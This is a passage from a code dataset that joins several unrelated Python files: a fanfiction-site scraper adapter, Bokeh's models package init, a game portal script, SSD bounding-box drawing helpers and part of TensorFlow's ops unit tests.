components = urlparse.urlparse(url)
query_data = urlparse.parse_qs(components.query)
self.story.setMetadata('author', stripHTML(author_anchor))
self.story.setMetadata('authorId', query_data['uid'][0])
self.story.setMetadata('authorUrl', url)
sort_div = soup.find('div', id='sort')
self.story.setMetadata('reviews', stripHTML(sort_div('a')[1]))
listbox_tag = soup.find('div', {'class': 'listbox'})
for span_tag in listbox_tag('span'):
key = span_tag.string
if key:
key = key.strip(' :')
try:
value = stripHTML(span_tag.nextSibling)
# This can happen with some fancy markup in the summary. Just
# ignore this error and set value to None, the summary parsing
# takes care of this
except AttributeError:
value = None
if key == 'Summary':
contents = []
keep_summary_html = self.getConfig('keep_summary_html')
for sibling in _yield_next_siblings(span_tag):
if isinstance(sibling, Tag):
# Encountered next label, break. Not as bad as other
# e-fiction sites, let's hope this is enough for proper
# parsing.
if sibling.name == 'span' and sibling.get('class', None) == 'label':
break
if keep_summary_html:
contents.append(self.utf8FromSoup(self.url, sibling))
else:
contents.append(''.join(sibling(text=True)))
else:
contents.append(sibling)
# Remove the preceding break line tag and other crud
if contents:
contents.pop()
if contents:
contents.pop()
self.story.setMetadata('description', ''.join(contents))
elif key == 'Rated':
self.story.setMetadata('rating', value)
elif key == 'Categories':
for sibling in span_tag.findNextSiblings(['a', 'br']):
if sibling.name == 'br':
break
self.story.addToList('category', stripHTML(sibling))
# Seems to be always "None" for some reason
elif key == 'Characters':
for sibling in span_tag.findNextSiblings(['a', 'br']):
if sibling.name == 'br':
break
self.story.addToList('characters', stripHTML(sibling))
elif key == 'Genres':
for sibling in span_tag.findNextSiblings(['a', 'br']):
if sibling.name == 'br':
break
self.story.addToList('genre', stripHTML(sibling))
elif key == 'Warnings':
for sibling in span_tag.findNextSiblings(['a', 'br']):
if sibling.name == 'br':
break
self.story.addToList('warnings', stripHTML(sibling))
# Challenges
elif key == 'Series':
a = span_tag.findNextSibling('a')
if not a:
continue
self.story.setMetadata('series', stripHTML(a))
self.story.setMetadata('seriesUrl', urlparse.urljoin(self.BASE_URL, a['href']))
elif key == 'Chapters':
self.story.setMetadata('numChapters', int(value))
elif key == 'Completed':
self.story.setMetadata('status', 'Completed' if value == 'Yes' else 'In-Progress')
elif key == 'Word count':
self.story.setMetadata('numWords', value)
elif key == 'Published':
self.story.setMetadata('datePublished', makeDate(value, self.DATETIME_FORMAT))
elif key == 'Updated':
self.story.setMetadata('dateUpdated', makeDate(value, self.DATETIME_FORMAT))
for p_tag in listbox_tag.findNextSiblings('p'):
chapter_anchor = p_tag.find('a', href=lambda href: href and href.startswith('viewstory.php?sid='))
if not chapter_anchor:
continue
title = stripHTML(chapter_anchor)
url = urlparse.urljoin(self.BASE_URL, chapter_anchor['href'])
self.chapterUrls.append((title, url))
def getChapterText(self, url):
url += self.AGE_CONSENT_URL_SUFFIX
soup = self._customized_fetch_url(url)
return self.utf8FromSoup(url, soup.find('div', id='story'))
| 38.192488 | 133 | 0.587216 |
6f48d22148d40e03dac4ff439f8196edbdc90641 | 2,966 | py | Python | bokeh/models/__init__.py | timgates42/bokeh | fb8b07b838f4d07d520cfe899779a11bc89f3c77 | [
"BSD-3-Clause"
] | 1 | 2015-01-31T14:42:39.000Z | 2015-01-31T14:42:39.000Z | bokeh/models/__init__.py | timgates42/bokeh | fb8b07b838f4d07d520cfe899779a11bc89f3c77 | [
"BSD-3-Clause"
] | 1 | 2021-05-08T06:24:26.000Z | 2021-05-08T06:24:26.000Z | bokeh/models/__init__.py | timgates42/bokeh | fb8b07b838f4d07d520cfe899779a11bc89f3c77 | [
"BSD-3-Clause"
] | 1 | 2021-03-04T05:23:36.000Z | 2021-03-04T05:23:36.000Z | #-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2019, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
''' Provide Bokeh model "building block" classes.
One of the central design principals of Bokeh is that, regardless of
how the plot creation code is spelled in Python (or other languages),
the result is an object graph that encompasses all the visual and
data aspects of the scene. Furthermore, this *scene graph* is to be
serialized, and it is this serialized graph that the client library
BokehJS uses to render the plot. The low-level objects that comprise
a Bokeh scene graph are called :ref:`Models <bokeh.model>`.
'''
# This file is excluded from flake8 checking in setup.cfg
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
import logging # isort:skip
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Bokeh imports
from ..core.property.dataspec import expr, field, value # Legacy API
from ..model import Model
from .annotations import *
from .arrow_heads import *
from .axes import *
from .callbacks import *
from .expressions import *
from .filters import *
from .formatters import *
from .glyphs import *
from .graphs import *
from .grids import *
from .layouts import *
from .map_plots import *
from .mappers import *
from .markers import *
from .plots import *
from .ranges import *
from .renderers import *
from .scales import *
from .selections import *
from .sources import *
from .textures import *
from .tickers import *
from .tiles import *
from .tools import *
from .transforms import *
from .widgets import *
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
# __all__ = include all explicit transitive imports above
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
| 36.617284 | 78 | 0.433918 |
9d2e5bc7524e4b305ab0524c691b410a62e7d66a | 147 | py | Python | scripts/portal/go_reward.py | G00dBye/YYMS | 1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb | [
"MIT"
] | 54 | 2019-04-16T23:24:48.000Z | 2021-12-18T11:41:50.000Z | scripts/portal/go_reward.py | G00dBye/YYMS | 1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb | [
"MIT"
] | 3 | 2019-05-19T15:19:41.000Z | 2020-04-27T16:29:16.000Z | scripts/portal/go_reward.py | G00dBye/YYMS | 1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb | [
"MIT"
] | 49 | 2020-11-25T23:29:16.000Z | 2022-03-26T16:20:24.000Z | # 811000500 - Princess No (pno)
response = sm.sendAskYesNo("Would you like to leave?")
if response:
sm.clearPartyInfo(811000100)
sm.dispose()
| 21 | 54 | 0.727891 |
563c085d1b09e42dfc2fa5ce87e1f6cfd2218502 | 4,773 | py | Python | SSD/notebooks/visualization.py | BerkeleyAutomation/traffic-cam-pipeline | 7bca5aefb8ee140348a3a2080a36d0acfbd39723 | [
"MIT"
] | null | null | null | SSD/notebooks/visualization.py | BerkeleyAutomation/traffic-cam-pipeline | 7bca5aefb8ee140348a3a2080a36d0acfbd39723 | [
"MIT"
] | null | null | null | SSD/notebooks/visualization.py | BerkeleyAutomation/traffic-cam-pipeline | 7bca5aefb8ee140348a3a2080a36d0acfbd39723 | [
"MIT"
] | null | null | null | # Copyright 2017 Paul Balanca. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import cv2
import random
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import matplotlib.cm as mpcm
# =========================================================================== #
# Some colormaps.
# =========================================================================== #
def colors_subselect(colors, num_classes=21):
dt = len(colors) // num_classes
sub_colors = []
for i in range(num_classes):
color = colors[i*dt]
if isinstance(color[0], float):
sub_colors.append([int(c * 255) for c in color])
else:
sub_colors.append([c for c in color])
return sub_colors
colors_plasma = colors_subselect(mpcm.plasma.colors, num_classes=21)
colors_tableau = [(255, 255, 255), (31, 119, 180), (174, 199, 232), (255, 127, 14), (255, 187, 120),
(44, 160, 44), (152, 223, 138), (214, 39, 40), (255, 152, 150),
(148, 103, 189), (197, 176, 213), (140, 86, 75), (196, 156, 148),
(227, 119, 194), (247, 182, 210), (127, 127, 127), (199, 199, 199),
(188, 189, 34), (219, 219, 141), (23, 190, 207), (158, 218, 229)]
# =========================================================================== #
# OpenCV drawing.
# =========================================================================== #
def draw_lines(img, lines, color=[255, 0, 0], thickness=2):
"""Draw a collection of lines on an image.
"""
for line in lines:
for x1, y1, x2, y2 in line:
cv2.line(img, (x1, y1), (x2, y2), color, thickness)
def draw_rectangle(img, p1, p2, color=[255, 0, 0], thickness=2):
cv2.rectangle(img, p1[::-1], p2[::-1], color, thickness)
def draw_bbox(img, bbox, shape, label, color=[255, 0, 0], thickness=2):
p1 = (int(bbox[0] * shape[0]), int(bbox[1] * shape[1]))
p2 = (int(bbox[2] * shape[0]), int(bbox[3] * shape[1]))
cv2.rectangle(img, p1, p2, color, thickness)
p1 = (p1[0], p1[1]+15)
cv2.putText(img, str(label), p1, cv2.FONT_HERSHEY_DUPLEX, 0.5, color, 1)
def bboxes_draw_on_img(img, classes, scores, bboxes, colors, thickness=2):
height, width, channel = img.shape
for i in range(bboxes.shape[0]):
bbox = bboxes[i]
color = colors[classes[i]]
# Draw bounding box...
p1 = (int(bbox[0] * width), int(bbox[1] * height))
p2 = (int(bbox[2] * width), int(bbox[3] * height))
cv2.rectangle(img, p1, p2, color, thickness)
# Draw text...
s = '%s/%.3f' % (classes[i], scores[i])
p1 = (p1[0], p1[1]-5)
cv2.putText(img, s, p1, cv2.FONT_HERSHEY_DUPLEX, 0.4, color, 1)
# =========================================================================== #
# Matplotlib show...
# =========================================================================== #
def plt_bboxes(img, classes, scores, bboxes, figsize=(10,10), linewidth=1.5):
"""Visualize bounding boxes. Largely inspired by SSD-MXNET!
"""
fig = plt.figure(figsize=figsize)
plt.imshow(img)
height = img.shape[0]
width = img.shape[1]
colors = dict()
for i in range(classes.shape[0]):
cls_id = int(classes[i])
if cls_id >= 0:
score = scores[i]
if cls_id not in colors:
colors[cls_id] = (random.random(), random.random(), random.random())
xmin = int(bboxes[i, 0] * height)
ymin = int(bboxes[i, 1] * width)
xmax = int(bboxes[i, 2] * height)
ymax = int(bboxes[i, 3] * width)
rect = plt.Rectangle((xmin, ymin), xmax - xmin,
ymax - ymin, fill=False,
edgecolor=colors[cls_id],
linewidth=linewidth)
plt.gca().add_patch(rect)
class_name = str(cls_id)
plt.gca().text(xmin, ymin - 2,
'{:s} | {:.3f}'.format(class_name, score),
bbox=dict(facecolor=colors[cls_id], alpha=0.5),
fontsize=12, color='white')
plt.show()
| 41.504348 | 100 | 0.508695 |
2ce47c4973f5695e3aebe6f6bafea99ac0d31303 | 138,924 | py | Python | tensorflow/python/framework/ops_test.py | jasonhargrove/tensorflow | 2cbcbccc976313810242ea7256c24030815f140f | [
"Apache-2.0"
] | 1 | 2021-08-18T18:07:02.000Z | 2021-08-18T18:07:02.000Z | tensorflow/python/framework/ops_test.py | harishsg99/tensorflow | 4f5a6e748eb8fb16d10738b7d1c2c95d5e6c008c | [
"Apache-2.0"
] | null | null | null | tensorflow/python/framework/ops_test.py | harishsg99/tensorflow | 4f5a6e748eb8fb16d10738b7d1c2c95d5e6c008c | [
"Apache-2.0"
] | null | null | null | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.python.framework.ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gc
import os
import threading
import weakref
from absl.testing import parameterized
import numpy as np
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.framework import tensor_shape_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.autograph.core import ag_ctx
from tensorflow.python.client import session
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import function as eager_function
from tensorflow.python.eager import wrap_function
from tensorflow.python.framework import composite_tensor
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import indexed_slices
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_spec
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_ops
from tensorflow.python.framework import test_util
from tensorflow.python.framework import type_spec
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import resources
from tensorflow.python.ops import special_math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
import tensorflow.python.ops.gradients # pylint: disable=unused-import
from tensorflow.python.platform import googletest
from tensorflow.python.util import compat
class ResourceTest(test_util.TensorFlowTestCase):
@test_util.run_deprecated_v1
def testBuildGraph(self):
with self.cached_session():
pt = test_ops.stub_resource_handle_op(container="a", shared_name="b")
test_ops.resource_create_op(pt).run()
@test_util.run_deprecated_v1
def testInitialize(self):
with self.cached_session():
handle = test_ops.stub_resource_handle_op(container="a", shared_name="b")
resources.register_resource(
handle=handle,
create_op=test_ops.resource_create_op(handle),
is_initialized_op=test_ops.resource_initialized_op(handle))
self.assertEqual(
len(
resources.report_uninitialized_resources(
resources.shared_resources()).eval()), 1)
resources.initialize_resources(resources.shared_resources()).run()
self.assertEqual(
len(
resources.report_uninitialized_resources(
resources.shared_resources()).eval()), 0)
class TensorAndShapeTest(test_util.TensorFlowTestCase):
def testShape(self):
op = ops.Operation(
ops._NodeDef("FloatOutput", "myop"), ops.Graph(), [], [dtypes.float32])
t = op.outputs[0]
self.assertEqual(tensor_shape.unknown_shape(), t.get_shape())
t.set_shape([1, 2, 3])
self.assertEqual([1, 2, 3], t.get_shape())
def testIterable(self):
if not context.executing_eagerly():
self.skipTest("Eager-mode test")
op = ops.Operation(
ops._NodeDef("FloatOutput", "myop"), ops.Graph(), [], [dtypes.float32])
t = op.outputs[0]
with self.assertRaisesRegex(TypeError, "Cannot iterate"):
iter(t)
def testIterableGraph(self):
if context.executing_eagerly():
self.skipTest("Graph-mode test")
op = ops.Operation(
ops._NodeDef("FloatOutput", "myop"), ops.Graph(), [], [dtypes.float32])
t = op.outputs[0]
with self.assertRaisesRegex(TypeError, "iterating.*not allowed in Graph"):
next(iter(t))
with self.assertRaisesRegex(TypeError, "iterating.*AutoGraph did convert"):
with ag_ctx.ControlStatusCtx(ag_ctx.Status.ENABLED):
next(iter(t))
with self.assertRaisesRegex(TypeError, "iterating.*AutoGraph is disabled"):
with ag_ctx.ControlStatusCtx(ag_ctx.Status.DISABLED):
next(iter(t))
def testImplicitBool(self):
op = ops.Operation(
ops._NodeDef("FloatOutput", "myop"), ops.Graph(), [], [dtypes.bool])
t = op.outputs[0]
with self.assertRaisesRegex(TypeError,
"using.*as a.*bool.*not allowed in Graph"):
bool(t)
with self.assertRaisesRegex(TypeError,
"using.*as a.*bool.*AutoGraph did convert"):
with ag_ctx.ControlStatusCtx(ag_ctx.Status.ENABLED):
bool(t)
with self.assertRaisesRegex(TypeError,
"using.*as a.*bool.*AutoGraph is disabled"):
with ag_ctx.ControlStatusCtx(ag_ctx.Status.DISABLED):
bool(t)
def testAddShape(self):
with self.cached_session():
a = array_ops.zeros([2, 3])
b = array_ops.ones([1, 3])
c = a + b
self.assertEqual([2, 3], c.shape)
@test_util.run_deprecated_v1
def testUnknownDim(self):
with self.cached_session():
a = array_ops.placeholder(dtype=dtypes.float32, shape=[2, None, 3])
b = array_ops.placeholder(dtype=dtypes.float32, shape=[2, None, 3])
c = a + b
self.assertEqual([2, None, 3], c.shape.as_list())
@test_util.run_deprecated_v1
def testUnknownShape(self):
with self.cached_session():
a = array_ops.placeholder(dtype=dtypes.float32, shape=None)
b = array_ops.ones([1, 3])
c = a + b
self.assertEqual(tensor_shape.unknown_shape(), c.shape)
@test_util.run_deprecated_v1
def testScalarShape(self):
with self.cached_session():
a = array_ops.placeholder(dtype=dtypes.float32, shape=[])
b = array_ops.ones([])
c = a + b
self.assertEqual(tensor_shape.TensorShape([]), c.shape)
@test_util.run_deprecated_v1
def testShapeFunctionError(self):
with self.cached_session():
a = array_ops.ones([1, 2, 3])
b = array_ops.ones([4, 5, 6])
with self.assertRaisesRegex(
ValueError, r"Dimensions must be equal, but are 2 and 5 for .*add"
r".*Add(V2)?.* with input shapes: \[1,2,3\], \[4,5,6\]."):
_ = a + b
def testNumpyArray(self):
with ops.Graph().as_default():
x = array_ops.ones((3, 4), name="test_ones")
with self.assertRaisesRegex(NotImplementedError,
r"Cannot convert a symbolic.+test_ones"):
np.array(x)
with self.assertRaisesRegex(TypeError, "not well defined.+test_ones"):
len(x)
# EagerTensors should still behave as numpy arrays.
with context.eager_mode():
x = array_ops.ones((3, 4))
self.assertAllEqual(x, np.ones((3, 4)))
self.assertAllEqual(np.array(x), np.ones((3, 4)))
self.assertLen(x, 3)
def testConstructor(self):
a = array_ops.ones([])
for name in ["T", "astype", "ravel", "transpose", "reshape", "clip", "size",
"tolist", "data"]:
with self.assertRaisesRegex(
AttributeError, r"If you are looking for numpy-related methods"):
getattr(a, name)
with self.assertRaisesRegex(
AttributeError, r"object has no attribute"):
a.foo_bar()
def testRef(self):
x1 = constant_op.constant(3)
x2 = x1
y = constant_op.constant(3)
z = constant_op.constant([6, 10])
w = variables.Variable(5)
self.assertEqual(x1.ref(), x1.ref())
self.assertEqual(x2.ref(), x2.ref())
self.assertEqual(x1.ref(), x2.ref())
self.assertEqual(y.ref(), y.ref())
self.assertEqual(z.ref(), z.ref())
self.assertEqual(w.ref(), w.ref())
self.assertNotEqual(x1.ref(), y.ref())
self.assertNotEqual(x1.ref(), z.ref())
self.assertNotEqual(x1.ref(), w.ref())
self.assertNotEqual(y.ref(), z.ref())
self.assertNotEqual(y.ref(), w.ref())
self.assertNotEqual(z.ref(), w.ref())
def testRefDeref(self):
x1 = constant_op.constant(3)
x2 = x1
y = constant_op.constant(3)
z = constant_op.constant([6, 10])
w = variables.Variable(5)
self.assertIs(x1, x1.ref().deref())
self.assertIs(x2, x2.ref().deref())
self.assertIs(x1, x2.ref().deref())
self.assertIs(x2, x1.ref().deref())
self.assertIs(y, y.ref().deref())
self.assertIs(z, z.ref().deref())
self.assertIsNot(x1, y.ref().deref())
self.assertIsNot(x1, z.ref().deref())
self.assertIsNot(x1, w.ref().deref())
self.assertIsNot(y, z.ref().deref())
self.assertIsNot(y, w.ref().deref())
self.assertIsNot(z, w.ref().deref())
def testRefInSet(self):
x1 = constant_op.constant(3)
x2 = x1
y = constant_op.constant(3)
z = constant_op.constant([6, 10])
w = variables.Variable(5)
self.assertEqual(x1.ref(), x2.ref())
tensor_set = {
x1.ref(),
x2.ref(),
y.ref(),
z.ref(),
w.ref(),
}
self.assertLen(tensor_set, 4)
self.assertIn(x1.ref(), tensor_set)
self.assertIn(x2.ref(), tensor_set)
self.assertIn(y.ref(), tensor_set)
self.assertIn(z.ref(), tensor_set)
self.assertIn(w.ref(), tensor_set)
def testRefInDict(self):
x1 = constant_op.constant(3)
x2 = x1
y = constant_op.constant(3)
z = constant_op.constant([6, 10])
w = variables.Variable(5)
self.assertEqual(x1.ref(), x2.ref())
tensor_dict = {
x1.ref(): "x1",
y.ref(): "y",
z.ref(): "z",
w.ref(): "w",
}
self.assertLen(tensor_dict, 4)
# Overwriting x1
tensor_dict[x2.ref()] = "x2"
self.assertLen(tensor_dict, 4)
self.assertEqual(tensor_dict[x1.ref()], "x2")
self.assertEqual(tensor_dict[x2.ref()], "x2")
self.assertEqual(tensor_dict[y.ref()], "y")
self.assertEqual(tensor_dict[z.ref()], "z")
self.assertEqual(tensor_dict[w.ref()], "w")
def testTensorRefStrong(self):
x = constant_op.constant(1.)
x_ref = x.ref()
del x
self.assertIsNotNone(x_ref.deref())
def testVariableRefStrong(self):
x = variables.Variable(1.)
x_ref = x.ref()
del x
self.assertIsNotNone(x_ref.deref())
@test_util.run_in_graph_and_eager_modes
def testBitwiseAndNumeric(self):
x = constant_op.constant([0, 1, 3])
y = constant_op.constant([1, 1, 1])
z = x & y
self.assertAllEqual(z, [0, 1, 1])
@test_util.run_in_graph_and_eager_modes
def testBitwiseAndBool(self):
x = constant_op.constant([False, False, True, True])
y = constant_op.constant([False, True, False, True])
z = x & y
self.assertAllEqual(z, [False, False, False, True])
@test_util.run_in_graph_and_eager_modes
def testBitwiseAndErrors(self):
x_int = constant_op.constant(0)
x_bool = constant_op.constant(True)
if context.executing_eagerly(): # :(
expected_errtype = errors.InvalidArgumentError
else:
expected_errtype = TypeError
with self.assertRaises(expected_errtype):
_ = x_int & x_bool
with self.assertRaises(expected_errtype):
_ = x_int & constant_op.constant("a")
with self.assertRaises(expected_errtype):
_ = x_bool & x_int
with self.assertRaises(expected_errtype):
_ = x_bool & constant_op.constant("a")
with self.assertRaises(expected_errtype):
_ = constant_op.constant("a") & constant_op.constant("b")
@test_util.run_in_graph_and_eager_modes
def testBitwiseOrNumeric(self):
x = constant_op.constant([0, 1, 2])
y = constant_op.constant([1, 1, 1])
z = x | y
self.assertAllEqual(z, [1, 1, 3])
@test_util.run_in_graph_and_eager_modes
def testBitwiseOrBool(self):
x = constant_op.constant([False, False, True, True])
y = constant_op.constant([False, True, False, True])
z = x | y
self.assertAllEqual(z, [False, True, True, True])
@test_util.run_in_graph_and_eager_modes
def testBitwiseOrErrors(self):
x_int = constant_op.constant(0)
x_bool = constant_op.constant(True)
if context.executing_eagerly(): # :(
expected_errtype = errors.InvalidArgumentError
else:
expected_errtype = TypeError
with self.assertRaises(expected_errtype):
_ = x_int | x_bool
with self.assertRaises(expected_errtype):
_ = x_int | constant_op.constant("a")
with self.assertRaises(expected_errtype):
_ = x_bool | x_int
with self.assertRaises(expected_errtype):
_ = x_bool | constant_op.constant("a")
with self.assertRaises(expected_errtype):
_ = constant_op.constant("a") | constant_op.constant("b")
@test_util.run_in_graph_and_eager_modes
def testBitwiseXorNumeric(self):
x = constant_op.constant([0, 1, 3])
y = constant_op.constant([1, 1, 1])
z = x ^ y
self.assertAllEqual(z, [1, 0, 2])
@test_util.run_in_graph_and_eager_modes
def testBitwiseXorBool(self):
x = constant_op.constant([False, False, True, True])
y = constant_op.constant([False, True, False, True])
z = x ^ y
self.assertAllEqual(z, [False, True, True, False])
@test_util.run_in_graph_and_eager_modes
def testBitwiseXorErrors(self):
x_int = constant_op.constant(0)
x_bool = constant_op.constant(True)
if context.executing_eagerly(): # :(
expected_errtype = errors.InvalidArgumentError
else:
expected_errtype = TypeError
with self.assertRaises(expected_errtype):
_ = x_int ^ x_bool
with self.assertRaises(expected_errtype):
_ = x_int ^ constant_op.constant("a")
with self.assertRaises(expected_errtype):
_ = x_bool ^ x_int
with self.assertRaises(expected_errtype):
_ = x_bool ^ constant_op.constant("a")
with self.assertRaises(expected_errtype):
_ = constant_op.constant("a") ^ constant_op.constant("b")
@test_util.run_in_graph_and_eager_modes
def testBitwiseNotNumeric(self):
x = constant_op.constant([0, dtypes.int32.min, 1])
# pylint: disable=invalid-unary-operand-type
y = ~x
self.assertAllEqual(y, [-1, dtypes.int32.max, -2])
@test_util.run_in_graph_and_eager_modes
def testBitwiseNotBool(self):
x = constant_op.constant([False, True])
# pylint: disable=invalid-unary-operand-type
y = ~x
self.assertAllEqual(y, [True, False])
@test_util.run_in_graph_and_eager_modes
def testBitwiseNotErrors(self):
if context.executing_eagerly(): # :(
expected_errtype = errors.InvalidArgumentError
else:
expected_errtype = TypeError
# pylint: disable=invalid-unary-operand-type
with self.assertRaises(expected_errtype):
_ = ~constant_op.constant("a")
@test_util.run_all_in_graph_and_eager_modes
class IndexedSlicesTest(test_util.TensorFlowTestCase):
def testToTensor(self):
values = constant_op.constant([2, 3, 5, 7], shape=[2, 2])
indices = constant_op.constant([0, 2])
x = ops.IndexedSlices(values, indices)
with self.assertRaises(ValueError):
tensor = ops.convert_to_tensor(x, name="tensor")
self.assertEqual(tensor_shape.TensorShape(None), x.shape)
dense_shape = constant_op.constant([3, 2])
y = ops.IndexedSlices(values, indices, dense_shape)
tensor = ops.convert_to_tensor(y, name="tensor")
self.assertAllEqual(tensor.shape, y.shape)
self.assertAllEqual(self.evaluate(tensor), [[2, 3], [0, 0], [5, 7]])
@test_util.run_gpu_only
def testEagerCopy(self):
with context.eager_mode():
var = variables.Variable([[0.0], [0.0], [0.0], [0.0]], name="tensor")
with backprop.GradientTape() as tape:
a = array_ops.gather(array_ops.gather(var, [0, 1]), [0, 1])
b = array_ops.gather(array_ops.gather(var, [2, 3]), [0, 1])
r = special_math_ops.einsum("ij,ij->i", a, b)
g = tape.gradient(r, [var])[0]
values = g.values if isinstance(g, ops.IndexedSlices) else g
self.assertAllEqual(values.get_shape(), [4, 1])
def testNegation(self):
values = constant_op.constant([2, 3, 5, 7], shape=[2, 2])
indices = constant_op.constant([0, 2])
x = -ops.IndexedSlices(values, indices)
self.assertAllEqual(x.values, [[-2, -3], [-5, -7]])
self.assertAllEqual(x.indices, [0, 2])
def testScalarMul(self):
values = constant_op.constant([2, 3, 5, 7], shape=[2, 2])
indices = constant_op.constant([0, 2])
x = math_ops.scalar_mul(-2, ops.IndexedSlices(values, indices))
self.assertAllEqual(x.values, [[-4, -6], [-10, -14]])
self.assertAllEqual(x.indices, [0, 2])
@test_util.run_all_in_graph_and_eager_modes
class IndexedSlicesSpecTest(test_util.TensorFlowTestCase,
parameterized.TestCase):
def assertAllTensorsEqual(self, list1, list2):
self.assertLen(list1, len(list2))
for (t1, t2) in zip(list1, list2):
self.assertAllEqual(t1, t2)
def testConstruction(self):
spec1 = indexed_slices.IndexedSlicesSpec()
self.assertIsNone(spec1._shape.rank)
self.assertEqual(spec1._values_dtype, dtypes.float32)
self.assertEqual(spec1._indices_dtype, dtypes.int64)
self.assertIsNone(spec1._dense_shape_dtype)
self.assertEqual(spec1._indices_shape.as_list(), [None])
spec2 = indexed_slices.IndexedSlicesSpec([None, None], dtypes.string,
dtypes.int32, dtypes.int64, [10])
self.assertEqual(spec2._shape.as_list(), [None, None])
self.assertEqual(spec2._values_dtype, dtypes.string)
self.assertEqual(spec2._indices_dtype, dtypes.int32)
self.assertEqual(spec2._dense_shape_dtype, dtypes.int64)
self.assertEqual(spec2._indices_shape.as_list(), [10])
def testValueType(self):
spec1 = indexed_slices.IndexedSlicesSpec()
self.assertEqual(spec1.value_type, ops.IndexedSlices)
@parameterized.parameters([
(indexed_slices.IndexedSlicesSpec(),
(tensor_shape.TensorShape(None), dtypes.float32, dtypes.int64, None,
tensor_shape.TensorShape([None]))),
(indexed_slices.IndexedSlicesSpec(shape=[5, None, None]),
(tensor_shape.TensorShape([5, None, None]), dtypes.float32,
dtypes.int64, None, tensor_shape.TensorShape([None]))),
(indexed_slices.IndexedSlicesSpec(
dtype=dtypes.int32, dense_shape_dtype=dtypes.int64),
(tensor_shape.TensorShape(None), dtypes.int32, dtypes.int64,
dtypes.int64, tensor_shape.TensorShape([None]))),
(indexed_slices.IndexedSlicesSpec(indices_shape=[100]),
(tensor_shape.TensorShape(None), dtypes.float32, dtypes.int64, None,
tensor_shape.TensorShape([100]))),
]) # pyformat: disable
def testSerialize(self, spec, expected):
serialization = spec._serialize()
# TensorShape has an unconventional definition of equality, so we can't use
# assertEqual directly here. But repr() is deterministic and lossless for
# the expected values, so we can use that instead.
self.assertEqual(repr(serialization), repr(expected))
@parameterized.parameters([
(indexed_slices.IndexedSlicesSpec(dtype=dtypes.string), (
tensor_spec.TensorSpec(None, dtypes.string),
tensor_spec.TensorSpec([None], dtypes.int64),
)),
(indexed_slices.IndexedSlicesSpec(
dtype=dtypes.string, dense_shape_dtype=dtypes.int32), (
tensor_spec.TensorSpec(None, dtypes.string),
tensor_spec.TensorSpec([None], dtypes.int64),
tensor_spec.TensorSpec([None], dtypes.int32),
)),
(indexed_slices.IndexedSlicesSpec(
shape=[5, 10, 15], dense_shape_dtype=dtypes.int32), (
tensor_spec.TensorSpec([None, 10, 15], dtypes.float32),
tensor_spec.TensorSpec([None], dtypes.int64),
tensor_spec.TensorSpec([3], dtypes.int32),
)),
(indexed_slices.IndexedSlicesSpec(
shape=[5, 10, 15], dense_shape_dtype=dtypes.int32,
indices_shape=[20]), (
tensor_spec.TensorSpec([20, 10, 15], dtypes.float32),
tensor_spec.TensorSpec([20], dtypes.int64),
tensor_spec.TensorSpec([3], dtypes.int32),
)),
])
def testComponentSpecs(self, spec, expected):
self.assertEqual(spec._component_specs, expected)
@parameterized.parameters([
{
"spec": indexed_slices.IndexedSlicesSpec(),
"values": [3.0, 5.0],
"indices": [5, 10]
},
{
"spec":
indexed_slices.IndexedSlicesSpec(dense_shape_dtype=dtypes.int32),
"values": [3.0, 5.0],
"indices": [5, 10],
"dense_shape": [100]
},
])
def testToFromComponents(self, spec, indices, values, dense_shape=None):
x = ops.IndexedSlices(indices, values, dense_shape)
actual_components = spec._to_components(x)
if dense_shape is None:
self.assertAllTensorsEqual(actual_components, [indices, values])
else:
self.assertAllTensorsEqual(actual_components,
[indices, values, dense_shape])
st_reconstructed = spec._from_components(actual_components)
self.assertAllEqual(x.indices, st_reconstructed.indices)
self.assertAllEqual(x.values, st_reconstructed.values)
if dense_shape is None:
self.assertIsNone(st_reconstructed.dense_shape)
else:
